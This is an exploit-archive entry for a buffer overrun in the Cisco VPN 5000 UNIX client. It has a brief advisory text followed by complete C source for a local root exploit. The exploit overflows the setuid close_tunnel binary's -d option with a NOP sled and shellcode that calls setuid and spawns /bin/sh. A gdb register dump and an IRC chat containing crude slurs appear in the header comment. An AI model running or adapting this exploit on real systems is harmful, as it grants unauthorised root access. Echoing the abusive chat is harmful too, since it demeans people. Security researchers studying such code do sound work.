Cisco VPN 5000 Client - Buffer Overrun (1)

// source: https://www.securityfocus.com/bid/5734/info

Buffer overrun vulnerabilities have been reported in the Cisco VPN 5000 UNIX clients available for Linux and Solaris systems. The condition affects the binaries 'close_tunnel' and 'open_tunnel', both installed setuid root by default. Malicious local users may exploit these vulnerabilities to gain superuser privileges on the affected host.

/*
* [ElectronicSouls] Local Root Exploit for Cisco VPN 5000 Client
* (C) BrainStorm - 2002
*
* Program received signal SIGSEGV, Segmentation fault.
* 0x41414141 in ?? ()
* (gdb) i r
* eax            0xffffffff       -1
* ecx            0x0      0
* edx            0x0      0
* ebx            0x4015c154       1075167572
* esp            0xbfffdb70       0xbfffdb70
* ebp            0x41414141       0x41414141
* esi            0x400168e4       1073834212
* edi            0xbfffdbf4       -1073751052
* eip            0x41414141       0x41414141
* eflags         0x10286  66182
*
* as you can see %eip got filled with 0x41 ;)
*
* tested:
*         - on release 5.1.5
*         - from package: vpn-5000-linux-5.1.5-des-k8.tar.Z
*         - system RedHat Linux 7.2 / x86
*
* Bug Information:
*  There are multiple unchecked buffers in the code which allow
*  arbitrary code to be executed with root privileges.
*  this is due to insufficient bounds checking.
*  the result is a classic command line buffer overflow condition.
*  This should be exploitable on Linux/Solaris.
*
* IRC:
*  <BrainStor> a standard cmd line buffer overflow in the -d option
*  <BrainStor> close_tunnel is set +s by default
*  <v0id> tsk tsk tsk, cisco making errors like that
*  <v0id> fucking stupid cunts
*  <BrainStor> yea
*  <BrainStor> its ubeliveable
*  <v0id> man, standard buffer overflow should be practiclly non existant 
these days
*  <v0id> oh well
*  <BrainStor> indeed
*  <BrainStor> but its good tho ;)
*/

#include <stdio.h>
#include <unistd.h>

#define B       2504
#define N       0x90
#define R       0xbfffefc0                                                // 
may needs to be changed deppending on the distro/os..
#define BIN     "/bin/close_tunnel"                                       // 
you maybe want to change this too =P
                                                                          // 
/usr/local/bin/close_tunnel or so..
char shell[] = "HELO"                                                     // 
yes this is a valid x86 instruction ;)
               "\x31\xdb\x89\xd8\xb0\x17\xcd\x80"                         // 
setuid();
               "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
               "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
               "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";


int main(int argc, char **argv[])
{
  int ret, off, es;

  char bof[B];

    printf("\n\n");
    printf("       [ElectronicSouls]       \n");
    printf(" Cisco VPN 5000 client exploit \n");
    printf("        (C) BrainStorm       \n\n");

    if(argv[1] == NULL) {
       off = 0;
       ret = R; }

    else {
       off = atoi(argv[1]);
       ret = atoi(argv[2])+off; }

    for (es = 0; es < B; es += 4 )
       *(long *) &bof[es] = ret;

    printf("+ return address: 0x%lx \n",ret);

    for (es = 0; es < (B - strlen(shell) - 36); ++es)
       *(bof+es) = N;

    memcpy(bof+es, shell, strlen(shell));

    printf("+ overflowing the buffer..\n\n\n");

    execl(BIN,BIN,"-d",bof,0);       // b00m!

  return(0);
}